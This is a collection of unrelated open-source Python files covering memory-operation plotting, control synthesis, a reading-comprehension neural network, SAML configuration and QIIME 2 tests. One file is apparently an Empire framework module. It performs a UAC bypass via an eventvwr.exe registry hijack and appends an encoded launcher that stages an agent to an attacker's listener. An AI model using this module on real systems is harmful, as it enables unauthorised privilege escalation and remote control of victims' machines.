yaxis = "Number of operations"
return plot_time_series(plotdict, title, xaxis, yaxis, ysplits,
logscale=False, cp_series=cp_series)
def vmaops_all_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"All VMA operations over time")
def vmaops_allocs_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA allocations over time")
def vmaops_frees_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA frees over time")
def vmaops_resizes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA resizes over time", ysplits=[500, 5000])
def vmaops_relocs_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA relocations over time")
def vmaops_flag_changes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA flag changes over time")
def vmaops_access_changes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA permission changes over time")
def vmaops_nonallocfree_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA resizes, relocations, and permission changes")
##############################################################################
vmaops_all_plot = multiapp_plot('vma-ops-all',
vmaops_auxdata, vmaops_all_ts_plotfn,
vmaops_all_datafn, vmaops_resetfn)
vmaops_allocs_plot = multiapp_plot('vma-ops-allocs',
vmaops_auxdata, vmaops_allocs_ts_plotfn,
vmaops_allocs_datafn, vmaops_resetfn)
vmaops_frees_plot = multiapp_plot('vma-ops-frees', vmaops_auxdata,
vmaops_frees_ts_plotfn, vmaops_frees_datafn, vmaops_resetfn)
vmaops_resizes_plot = multiapp_plot('vma-ops-resizes',
vmaops_auxdata, vmaops_resizes_ts_plotfn,
vmaops_resizes_datafn, vmaops_resetfn)
vmaops_relocations_plot = multiapp_plot('vma-ops-relocations',
vmaops_auxdata, vmaops_relocs_ts_plotfn,
vmaops_relocations_datafn, vmaops_resetfn)
vmaops_access_changes_plot = multiapp_plot('vma-ops-access_changes',
vmaops_auxdata, vmaops_access_changes_ts_plotfn,
vmaops_access_changes_datafn, vmaops_resetfn)
vmaops_flag_changes_plot = multiapp_plot('vma-ops-flag_changes',
vmaops_auxdata, vmaops_flag_changes_ts_plotfn,
vmaops_flag_changes_datafn, vmaops_resetfn)
vmaops_nonallocfree_plot = multiapp_plot('vma-ops-nonallocfree',
vmaops_auxdata, vmaops_nonallocfree_ts_plotfn,
vmaops_nonallocfree_datafn, vmaops_resetfn)
if __name__ == '__main__':
print_error_exit("not an executable module")
| pjh/vm-analyze | plotting/plot_vmaops.py | Python | bsd-3-clause | 11,539 |
# Copyright (c) 2011-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
"""
Algorithms related to controller synthesis for discretized dynamics.
Primary functions:
- L{get_input}
Helper functions:
- L{get_input_helper}
- L{is_seq_inside}
See Also
========
L{discretize}
"""
from __future__ import absolute_import
import logging
import numpy as np
from cvxopt import matrix, solvers
import polytope as pc
from .feasible import solve_feasible, createLM, _block_diag2
logger = logging.getLogger(__name__)
try:
import cvxopt.glpk
except ImportError:
logger.warn(
'`tulip` failed to import `cvxopt.glpk`.\n'
'Will use Python solver of `cvxopt`.')
solvers.options['msg_lev'] = 'GLP_MSG_OFF'
def get_input(
x0, ssys, abstraction,
start, end,
R=[], r=[], Q=[], mid_weight=0.0,
test_result=False
):
"""Compute continuous control input for discrete transition.
Computes a continuous control input sequence
which takes the plant:
- from state C{start}
- to state C{end}
These are states of the partition C{abstraction}.
The computed control input is such that::
f(x, u) = x'Rx +r'x +u'Qu +mid_weight *|xc-x(0)|_2
be minimal.
C{xc} is the chebyshev center of the final cell.
If no cost parameters are given, then the defaults are:
- Q = I
- mid_weight = 3
Notes
=====
1. The same horizon length as in reachability analysis
should be used in order to guarantee feasibility.
2. If the closed loop algorithm has been used
to compute reachability the input needs to be
recalculated for each time step
(with decreasing horizon length).
In this case only u(0) should be used as
a control signal and u(1) ... u(N-1) discarded.
3. The "conservative" calculation makes sure that
the plant remains inside the convex hull of the
starting region during execution, i.e.::
x(1), x(2) ... x(N-1) are
\in conv_hull(starting region).
If the original proposition preserving partition
is not convex, then safety cannot be guaranteed.
@param x0: initial continuous state
@type x0: numpy 1darray
@param ssys: system dynamics
@type ssys: L{LtiSysDyn}
@param abstraction: abstract system dynamics
@type abstraction: L{AbstractPwa}
@param start: index of the initial state in C{abstraction.ts}
@type start: int >= 0
@param end: index of the end state in C{abstraction.ts}
@type end: int >= 0
@param R: state cost matrix for::
x = [x(1)' x(2)' .. x(N)']'
If empty, zero matrix is used.
@type R: size (N*xdim x N*xdim)
@param r: cost vector for state trajectory:
x = [x(1)' x(2)' .. x(N)']'
@type r: size (N*xdim x 1)
@param Q: input cost matrix for control input::
u = [u(0)' u(1)' .. u(N-1)']'
If empty, identity matrix is used.
@type Q: size (N*udim x N*udim)
@param mid_weight: cost weight for |x(N)-xc|_2
@param test_result: performs a simulation
(without disturbance) to make sure that
the calculated input sequence is safe.
@type test_result: bool
@return: array A where row k contains the
control input: u(k)
for k = 0,1 ... N-1
@rtype: (N x m) numpy 2darray
"""
#@param N: horizon length
#@type N: int >= 1
#@param conservative:
# if True,
# then force plant to stay inside initial
# state during execution.
#
# Otherwise, plant is forced to stay inside
# the original proposition preserving cell.
#@type conservative: bool
#@param closed_loop: should be True
# if closed loop discretization has been used.
#@type closed_loop: bool
part = abstraction.ppp
regions = part.regions
ofts = abstraction.ts
original_regions = abstraction.orig_ppp
orig = abstraction._ppp2orig
params = abstraction.disc_params
N = params['N']
conservative = params['conservative']
closed_loop = params['closed_loop']
if (len(R) == 0) and (len(Q) == 0) and \
(len(r) == 0) and (mid_weight == 0):
# Default behavior
Q = np.eye(N*ssys.B.shape[1])
R = np.zeros([N*x0.size, N*x0.size])
r = np.zeros([N*x0.size,1])
mid_weight = 3
if len(R) == 0:
R = np.zeros([N*x0.size, N*x0.size])
if len(Q) == 0:
Q = np.eye(N*ssys.B.shape[1])
if len(r) == 0:
r = np.zeros([N*x0.size,1])
if (R.shape[0] != R.shape[1]) or (R.shape[0] != N*x0.size):
raise Exception("get_input: "
"R must be square and have side N * dim(state space)")
if (Q.shape[0] != Q.shape[1]) or (Q.shape[0] != N*ssys.B.shape[1]):
raise Exception("get_input: "
"Q must be square and have side N * dim(input space)")
if ofts is not None:
start_state = start
end_state = end
if end_state not in ofts.states.post(start_state):
raise Exception('get_input: '
'no transition from state s' +str(start) +
' to state s' +str(end)
)
else:
print("get_input: "
"Warning, no transition matrix found, assuming feasible")
if (not conservative) & (orig is None):
print("List of original proposition preserving "
"partitions not given, reverting to conservative mode")
conservative = True
P_start = regions[start]
P_end = regions[end]
n = ssys.A.shape[1]
m = ssys.B.shape[1]
idx = range((N-1)*n, N*n)
if conservative:
# Take convex hull or P_start as constraint
if len(P_start) > 0:
if len(P_start) > 1:
# Take convex hull
vert = pc.extreme(P_start[0])
for i in range(1, len(P_start)):
vert = np.hstack([
vert,
pc.extreme(P_start[i])
])
P1 = pc.qhull(vert)
else:
P1 = P_start[0]
else:
P1 = P_start
else:
# Take original proposition preserving cell as constraint
P1 = original_regions[orig[start]]
# must be convex (therefore single polytope?)
if len(P1) > 0:
if len(P1) == 1:
P1 = P1[0]
else:
print P1
raise Exception("conservative = False flag requires "
"original regions to be convex")
if len(P_end) > 0:
low_cost = np.inf
low_u = np.zeros([N,m])
# for each polytope in target region
for P3 in P_end:
if mid_weight > 0:
rc, xc = pc.cheby_ball(P3)
R[
np.ix_(
range(n*(N-1), n*N),
range(n*(N-1), n*N)
)
] += mid_weight*np.eye(n)
r[idx, :] += -mid_weight*xc
try:
u, cost = get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=closed_loop
)
r[idx, :] += mid_weight*xc
except:
r[idx, :] += mid_weight*xc
continue
if cost < low_cost:
low_u = u
low_cost = cost
if low_cost == np.inf:
raise Exception("get_input: Did not find any trajectory")
else:
P3 = P_end
if mid_weight > 0:
rc, xc = pc.cheby_ball(P3)
R[
np.ix_(
range(n*(N-1), n*N),
range(n*(N-1), n*N)
)
] += mid_weight*np.eye(n)
r[idx, :] += -mid_weight*xc
low_u, cost = get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=closed_loop
)
if test_result:
good = is_seq_inside(x0, low_u, ssys, P1, P3)
if not good:
print("Calculated sequence not good")
return low_u
def get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=True
):
"""Calculates the sequence u_seq such that:
- x(t+1) = A x(t) + B u(t) + K
- x(k) \in P1 for k = 0,...N
- x(N) \in P3
- [u(k); x(k)] \in PU
and minimizes x'Rx + 2*r'x + u'Qu
"""
n = ssys.A.shape[1]
m = ssys.B.shape[1]
list_P = []
if closed_loop:
temp_part = P3
list_P.append(P3)
for i in xrange(N-1,0,-1):
temp_part = solve_feasible(
P1, temp_part, ssys, N=1,
closed_loop=False, trans_set=P1
)
list_P.insert(0, temp_part)
list_P.insert(0,P1)
L,M = createLM(ssys, N, list_P, disturbance_ind=[1])
else:
list_P.append(P1)
for i in xrange(N-1,0,-1):
list_P.append(P1)
list_P.append(P3)
L,M = createLM(ssys, N, list_P)
# Remove first constraint on x(0)
L = L[range(list_P[0].A.shape[0], L.shape[0]),:]
M = M[range(list_P[0].A.shape[0], M.shape[0]),:]
# Separate L matrix
Lx = L[:,range(n)]
Lu = L[:,range(n,L.shape[1])]
M = M - Lx.dot(x0).reshape(Lx.shape[0],1)
# Constraints
G = matrix(Lu)
h = matrix(M)
B_diag = ssys.B
for i in xrange(N-1):
B_diag = _block_diag2(B_diag,ssys.B)
K_hat = np.tile(ssys.K, (N,1))
A_it = ssys.A.copy()
A_row = np.zeros([n, n*N])
A_K = np.zeros([n*N, n*N])
A_N = np.zeros([n*N, n])
for i in xrange(N):
A_row = ssys.A.dot(A_row)
A_row[np.ix_(
range(n),
range(i*n, (i+1)*n)
)] = np.eye(n)
A_N[np.ix_(
range(i*n, (i+1)*n),
range(n)
)] = A_it
A_K[np.ix_(
range(i*n,(i+1)*n),
range(A_K.shape[1])
)] = A_row
A_it = ssys.A.dot(A_it)
Ct = A_K.dot(B_diag)
P = matrix(Q + Ct.T.dot(R).dot(Ct) )
q = matrix(
np.dot(
np.dot(x0.reshape(1, x0.size), A_N.T) +
A_K.dot(K_hat).T, R.dot(Ct)
) +
r.T.dot(Ct)
).T
sol = solvers.qp(P, q, G, h)
if sol['status'] != "optimal":
raise Exception("getInputHelper: "
"QP solver finished with status " +
str(sol['status'])
)
u = np.array(sol['x']).flatten()
cost = sol['primal objective']
return u.reshape(N, m), cost
def is_seq_inside(x0, u_seq, ssys, P0, P1):
"""Checks if the plant remains inside P0 for time t = 1, ... N-1
and that the plant reaches P1 for time t = N.
Used to test a computed input sequence.
No disturbance is taken into account.
@param x0: initial point for execution
@param u_seq: (N x m) array where row k is input for t = k
@param ssys: dynamics
@type ssys: L{LtiSysDyn}
@param P0: C{Polytope} where we want x(k) to remain for k = 1, ... N-1
@return: C{True} if x(k) \in P0 for k = 1, .. N-1 and x(N) \in P1.
C{False} otherwise
"""
N = u_seq.shape[0]
x = x0.reshape(x0.size, 1)
A = ssys.A
B = ssys.B
if len(ssys.K) == 0:
K = np.zeros(x.shape)
else:
K = ssys.K
inside = True
for i in xrange(N-1):
u = u_seq[i,:].reshape(u_seq[i, :].size, 1)
x = A.dot(x) + B.dot(u) + K
if not pc.is_inside(P0, x):
inside = False
un_1 = u_seq[N-1,:].reshape(u_seq[N-1, :].size, 1)
xn = A.dot(x) + B.dot(un_1) + K
if not pc.is_inside(P1, xn):
inside = False
return inside
def find_discrete_state(x0, part):
"""Return index identifying the discrete state
to which the continuous state x0 belongs to.
Notes
=====
1. If there are overlapping partitions
(i.e., x0 belongs to more than one discrete state),
then return the first discrete state ID
@param x0: initial continuous state
@type x0: numpy 1darray
@param part: state space partition
@type part: L{PropPreservingPartition}
@return: if C{x0} belongs to some
discrete state in C{part},
then return the index of that state
Otherwise return None, i.e., in case
C{x0} does not belong to any discrete state.
@rtype: int
"""
for (i, region) in enumerate(part):
if pc.is_inside(region, x0):
return i
return None
| necozay/tulip-control | tulip/abstract/find_controller.py | Python | bsd-3-clause | 14,468 |
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-EventVwrBypass',
'Author': ['@enigma0x3'],
'Description': ("Bypasses UAC by performing an image hijack on the .msc file extension and starting eventvwr.exe. "
"No files are dropped to disk, making this opsec safe."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/',
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-EventVwrBypass.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
script += "Invoke-EventVwrBypass -Command \"%s\"" % (launcher)
return script
| pierce403/EmpirePanel | lib/modules/privesc/bypassuac_eventvwr.py | Python | bsd-3-clause | 3,893 |
if __name__ == '__main__':
from views import *
app.run(debug=True)
| fxa90id/up-flask-forum | flask-forum.py | Python | bsd-3-clause | 76 |
# Modified by CNSL
# 1) including TDNN based char embedding
# 06/02/17
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import torch
import torch.nn as nn
from . import layers
from .tdnn import TDNN
from .highway import Highway
import torch.nn.functional as F
import pdb
class RnnDocReader(nn.Module):
"""Network for the Document Reader module of DrQA."""
RNN_TYPES = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
def __init__(self, opt, padding_idx=0, padding_idx_char=0):
super(RnnDocReader, self).__init__()
# Store config
self.opt = opt
#Cudnn
#if not opt['use_cudnn']:
# torch.backends.cudnn.enabled=False
# Word embeddings (+1 for padding), usually initialized by GloVE
self.embedding = nn.Embedding(opt['vocab_size'],
opt['embedding_dim'],
padding_idx=padding_idx)
# Char embeddings (+1 for padding)
#pdb.set_trace()
if opt['add_char2word']:
self.char_embedding = nn.Embedding(opt['vocab_size_char'],
opt['embedding_dim_char'],
padding_idx=padding_idx_char)
self.char_embedding.weight = nn.Parameter(torch.Tensor(opt['vocab_size_char'],opt['embedding_dim_char']).uniform_(-1,1))
self.TDNN = TDNN(opt)
if opt['nLayer_Highway'] > 0 :
self.Highway = Highway(opt['embedding_dim'] + opt['embedding_dim_TDNN'], opt['nLayer_Highway'], F.relu)
# ...(maybe) keep them fixed (word only)
if opt['fix_embeddings']:
for p in self.embedding.parameters():
p.requires_grad = False
# Register a buffer to (maybe) fill later for keeping *some* fixed
if opt['tune_partial'] > 0:
buffer_size = torch.Size((
opt['vocab_size'] - opt['tune_partial'] - 2,
opt['embedding_dim']
))
self.register_buffer('fixed_embedding', torch.Tensor(buffer_size))
# Projection for attention weighted question
if opt['use_qemb']:
if opt['add_char2word']:
self.qemb_match = layers.SeqAttnMatch(opt['embedding_dim'] + opt['embedding_dim_TDNN'])
else:
self.qemb_match = layers.SeqAttnMatch(opt['embedding_dim'])
# Input size to RNN: word emb + question emb + manual features
if opt['add_char2word']:
doc_input_size = opt['embedding_dim'] + opt['num_features'] + opt['embedding_dim_TDNN']
else:
doc_input_size = opt['embedding_dim'] + opt['num_features']
if opt['use_qemb']:
if opt['add_char2word']:
doc_input_size += opt['embedding_dim'] + opt['embedding_dim_TDNN']
else:
doc_input_size += opt['embedding_dim']
#pdb.set_trace()
# RNN document encoder
self.doc_rnn = layers.StackedBRNN(
input_size=doc_input_size,
hidden_size=opt['hidden_size'],
num_layers=opt['doc_layers'],
dropout_rate=opt['dropout_rnn'],
dropout_output=opt['dropout_rnn_output'],
concat_layers=opt['concat_rnn_layers'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding'],
)
# RNN question encoder
q_input_size = opt['embedding_dim']
if opt['add_char2word']:
q_input_size += opt['embedding_dim_TDNN']
self.question_rnn = layers.StackedBRNN(
input_size=q_input_size,
hidden_size=opt['hidden_size'],
num_layers=opt['question_layers'],
dropout_rate=opt['dropout_rnn'],
dropout_output=opt['dropout_rnn_output'],
concat_layers=opt['concat_rnn_layers'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding'],
)
# Output sizes of rnn encoders
doc_hidden_size = 2 * opt['hidden_size']
question_hidden_size = 2 * opt['hidden_size']
if opt['concat_rnn_layers']:
doc_hidden_size *= opt['doc_layers']
question_hidden_size *= opt['question_layers']
# Question merging
if opt['question_merge'] not in ['avg', 'self_attn']:
raise NotImplementedError('merge_mode = %s' % opt['merge_mode'])
if opt['question_merge'] == 'self_attn':
self.self_attn = layers.LinearSeqAttn(question_hidden_size)
# Q-P matching
opt['qp_rnn_size'] = doc_hidden_size + question_hidden_size
if opt['qp_bottleneck']:
opt['qp_rnn_size'] = opt['hidden_size_bottleneck']
self.qp_match = layers.GatedAttentionBilinearRNN(
x_size = doc_hidden_size,
y_size = question_hidden_size,
hidden_size= opt['qp_rnn_size'],
padding=opt['rnn_padding'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
birnn=opt['qp_birnn'],
concat = opt['qp_concat'],
gate=True
)
qp_matched_size = opt['qp_rnn_size']
if opt['qp_birnn']:
qp_matched_size = qp_matched_size * 2
if opt['qp_concat']:
qp_matched_size = qp_matched_size + doc_hidden_size
## PP matching:
#pdb.set_trace()
opt['pp_rnn_size'] = qp_matched_size * 2
if opt['pp_bottleneck']:
opt['pp_rnn_size'] = opt['hidden_size_bottleneck']
self.pp_match = layers.GatedAttentionBilinearRNN(
x_size = qp_matched_size,
y_size = qp_matched_size,
hidden_size= opt['pp_rnn_size'],
padding=opt['rnn_padding'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
birnn=opt['pp_birnn'],
concat = opt['pp_concat'],
gate=opt['pp_gate'],
rnn=opt['pp_rnn'],
identity = ['pp_identity']
)
pp_matched_size = opt['pp_rnn_size']
if opt['pp_birnn'] and opt['pp_rnn']:
pp_matched_size = pp_matched_size * 2
if opt['pp_concat']:
pp_matched_size = pp_matched_size + qp_matched_size
# Bilinear attention for span start/end
if opt['task_QA']:
self.start_attn = layers.BilinearSeqAttn(
pp_matched_size,
question_hidden_size
)
self.end_attn = layers.BilinearSeqAttn(
pp_matched_size,
question_hidden_size
)
# Paragraph Hierarchical Encoder
if opt['ans_sent_predict'] :
self.meanpoolLayer = layers.Selective_Meanpool(doc_hidden_size)
self.sentBRNN = layers.StackedBRNN(
input_size=pp_matched_size,
hidden_size=opt['hidden_size_sent'],
num_layers=opt['nLayer_Sent'],
concat_layers=False,
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding_sent'],
)
self.sentseqAttn = layers.BilinearSeqAttn(
opt['hidden_size_sent'],
question_hidden_size,
)
#def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c, x1_c_mask, x2_c, x2_c_mask):
#def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c=None, x2_c=None): # for this version, we do not utilize mask for char
def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c=None, x2_c=None, x1_sent_mask=None, word_boundary=None): # for this version, we do not utilize mask for char
#pdb.set_trace()
"""Inputs:
x1 = document word indices [batch * len_d]
x1_f = document word features indices [batch * len_d * nfeat]
x1_mask = document padding mask [batch * len_d] ==>
x2 = question word indices [batch * len_q]
x2_mask = question padding mask [batch * len_q] ==>
x1_c = document char indices [batch * len_d * max_char_per_word]
x1_c_mask = document char padding mask [batch * len_d * max_char_per_word] --> not implemented in this version
x2_c = question char indices [batch * len_q * max_char_per_word]
x2_c_mask = question char padding mask [batch * len_q * max_char_per_word] --> not implemented in this version
"""
# Embed both document and question
batch_size = x1.size()[0]
doc_len = x1.size()[1]
ques_len = x2.size()[1]
x1_emb = self.embedding(x1) # N x Td x D
x2_emb = self.embedding(x2) # N x Tq x D
if self.opt['add_char2word']:
max_wordL_d = x1_c.size()[2]
max_wordL_q = x2_c.size()[2]
x1_c = x1_c.view(-1, max_wordL_d)
x2_c = x2_c.view(-1, max_wordL_q)
x1_c_emb = self.char_embedding(x1_c)
x2_c_emb = self.char_embedding(x2_c)
x1_c_emb = x1_c_emb.view(batch_size,
doc_len,
max_wordL_d,
-1)
x2_c_emb = x2_c_emb.view(batch_size,
ques_len,
max_wordL_q,
-1)
# Produce char-aware word embed
x1_cw_emb = self.TDNN(x1_c_emb) # N x Td x sum(H)
x2_cw_emb = self.TDNN(x2_c_emb) # N x Tq x sum(H)
# Merge word + char
x1_emb = torch.cat((x1_emb, x1_cw_emb), 2)
x2_emb = torch.cat((x2_emb, x2_cw_emb), 2)
###x1_mask = torch.cat([x1_mask, x1_c_mask], 2) # For this version, we do not utilize char mask
###x2_mask = torch.cat([x2_mask, x2_c_mask], 2) # For this version, we do not utilize char mask
# Highway network
if self.opt['nLayer_Highway'] > 0:
[batch_size, seq_len, embed_size] = x1_emb.size()
x1_emb = self.Highway(x1_emb.view(-1, embed_size))
x1_emb = x1_emb.view(batch_size, -1, embed_size)
[batch_size, seq_len, embed_size] = x2_emb.size()
x2_emb = self.Highway(x2_emb.view(-1, embed_size))
x2_emb = x2_emb.view(batch_size, -1, embed_size)
else:
if (('x1_c' in locals()) and ('x2_c' in locals())):
#pdb.set_trace()
x1_sent_mask = x1_c
word_boundary = x2_c
# Dropout on embeddings
if self.opt['dropout_emb'] > 0:
x1_emb = nn.functional.dropout(x1_emb, p=self.opt['dropout_emb'], training=self.training)
x2_emb = nn.functional.dropout(x2_emb, p=self.opt['dropout_emb'], training=self.training)
# Add attention-weighted question representation
#pdb.set_trace()
if self.opt['use_qemb']:
x2_weighted_emb = self.qemb_match(x1_emb, x2_emb, x2_mask)
drnn_input = torch.cat([x1_emb, x2_weighted_emb, x1_f], 2)
else:
drnn_input = torch.cat([x1_emb, x1_f], 2)
# Encode document with RNN
doc_hiddens = self.doc_rnn(drnn_input, x1_mask)
#pdb.set_trace()
# Encode question with RNN
question_hiddens = self.question_rnn(x2_emb, x2_mask)
# QP matching
qp_matched_doc = self.qp_match(doc_hiddens, x1_mask, question_hiddens, x2_mask)
# PP matching
if not qp_matched_doc.is_contiguous():
qp_matched_doc = qp_matched_doc.contiguous()
pp_matched_doc = self.pp_match(qp_matched_doc, x1_mask, qp_matched_doc, x1_mask)
#print(pp_matched_doc.size())
#pdb.set_trace()
# Merge question hiddens
if self.opt['question_merge'] == 'avg':
q_merge_weights = layers.uniform_weights(question_hiddens, x2_mask)
elif self.opt['question_merge'] == 'self_attn':
q_merge_weights = self.self_attn(question_hiddens, x2_mask)
question_hidden = layers.weighted_avg(question_hiddens, q_merge_weights)
return_list = []
# Predict start and end positions
if self.opt['task_QA']:
start_scores = self.start_attn(pp_matched_doc, question_hidden, x1_mask)
end_scores = self.end_attn(pp_matched_doc, question_hidden, x1_mask)
return_list = return_list + [start_scores, end_scores]
# Pooling , currently no multi-task learning
if self.opt['ans_sent_predict']:
sent_hiddens = self.meanpoolLayer(pp_matched_doc, word_boundary)
if self.opt['nLayer_Sent'] > 0:
sent_hiddens = self.sentBRNN(sent_hiddens, x1_sent_mask)
sent_scores = self.sentseqAttn(sent_hiddens, question_hidden, x1_sent_mask)
return_list = return_list + [sent_scores]
return return_list
| calee88/ParlAI | parlai/agents/drqa_msmarco/rnet.py | Python | bsd-3-clause | 13,354 |
"""
Django Settings that more closely resemble SAML Metadata.
Detailed discussion is in doc/SETTINGS_AND_METADATA.txt.
"""
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
def get_metadata_config(request):
"""
Get Metadata based on configuration in settings.
Options are:
- SAML2IDP_REMOTES & SAML2IDP_CONFIG present in settings
- SAML2IDP_CONFIG_FUNCTION will be used to get REMOTES and CONFIG
per request. Dynamic way of loading configuration.
:return: Tuple holding SAML2IDP_CONFIG, SAML2IDP_REMOTES
"""
if hasattr(settings, 'SAML2IDP_CONFIG_FUNCTION'):
# We have a dynamic configuration.
config_func = import_function_from_str(
settings.SAML2IDP_CONFIG_FUNCTION)
if not config_func:
raise ImproperlyConfigured(
'Cannot import SAML2IDP_CONFIG_FUNCTION')
# Return SAML2IDP_CONFIG & SAML2IDP_REMOTES
return config_func(request)
elif (hasattr(settings, 'SAML2IDP_CONFIG') and
hasattr(settings, 'SAML2IDP_REMOTES')):
# We have static configuration!
return settings.SAML2IDP_CONFIG, settings.SAML2IDP_REMOTES
raise ImproperlyConfigured('Cannot load SAML2IDP configuration!')
def import_function_from_str(func):
"""
Import function from string.
:param func: Can be a string or a function
"""
if isinstance(func, str):
# function supplied as a string
mod_str, _, func_str = func.rpartition('.')
try:
mod = import_module(mod_str)
return getattr(mod, func_str)
except:
return None
return func
| Awingu/django-saml2-idp | saml2idp/saml2idp_metadata.py | Python | bsd-3-clause | 1,746 |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import qiime2
import qiime2.sdk
class TestUtil(unittest.TestCase):
def test_artifact_actions(self):
obs = qiime2.sdk.util.actions_by_input_type(None)
self.assertEqual(obs, [])
# For simplicity, we are gonna test the names of the plugin and
# the actions
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type('SingleInt')]
exp = [('dummy-plugin', [
'Do stuff normally, but override this one step sometimes'])]
self.assertEqual(obs, exp)
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type(
'Kennel[Cat]')]
self.assertEqual(obs, [])
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type(
'IntSequence1')]
exp = [('dummy-plugin', [
'A typical pipeline with the potential to raise an error',
'Concatenate integers', 'Identity', 'Identity', 'Identity',
'Do a great many things', 'Identity', 'Identity', 'Identity',
'Visualize most common integers',
'Split sequence of integers in half',
'Test different ways of failing', 'Optional artifacts method',
'Do stuff normally, but override this one step sometimes'])]
self.assertEqual(len(obs), 1)
self.assertEqual(obs[0][0], exp[0][0])
self.assertCountEqual(obs[0][1], exp[0][1])
if __name__ == '__main__':
unittest.main()
| thermokarst/qiime2 | qiime2/sdk/tests/test_util.py | Python | bsd-3-clause | 1,934 |
